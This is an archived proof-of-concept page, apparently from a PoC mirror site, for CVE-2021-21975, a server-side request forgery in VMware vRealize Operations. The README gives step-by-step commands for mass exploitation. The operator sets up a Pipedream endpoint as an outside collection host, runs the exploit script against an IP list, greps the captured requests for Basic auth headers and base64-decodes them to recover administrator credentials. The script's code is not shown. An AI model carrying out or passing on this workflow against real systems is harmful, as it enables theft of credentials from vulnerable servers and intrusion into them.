Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-21975 PoC — VMware vRealize Operations 代码问题漏洞

Source
Associated Vulnerability
Title:VMware vRealize Operations 代码问题漏洞 (CVE-2021-21975)
Description:vmware VMware vRealize Operations是美国威睿(vmware)公司的一个应用程序。一个统一的,基于AI的平台上为私有,混合和多云环境提供自动驾驶的IT运营管理。 VMware vRealize Operations 存在安全漏洞,该漏洞源于更新地址服务器端请求伪造和任意文件写入。
Readme
# CVE-2021-21975

#SSRF-POC - ssrf to cred leak

#First configure pd client.

#Now run ./pd deploy http-new-requests

#now replace the pipedream http request ex: Randomstring.m.pipedream.net in the script

#run this in a seperate terminal - ./pd logs new-requests | tee -a req.txt

#and now run this in another terminal  - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt
; base64 -d basic_uniq.txt 


"This is a early proof of concept created when the vulnerability went public at the time months ago, so use it on your own risk." :V

#credit
@wabaf3t
@D0rkerDevil
File Snapshot

[4.0K] /data/pocs/cdae556002190fd296ffc4989c5f8d4595808098 ├── [2.2K] 𝘊𝘝𝘌-2021-21975.py └── [ 637] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.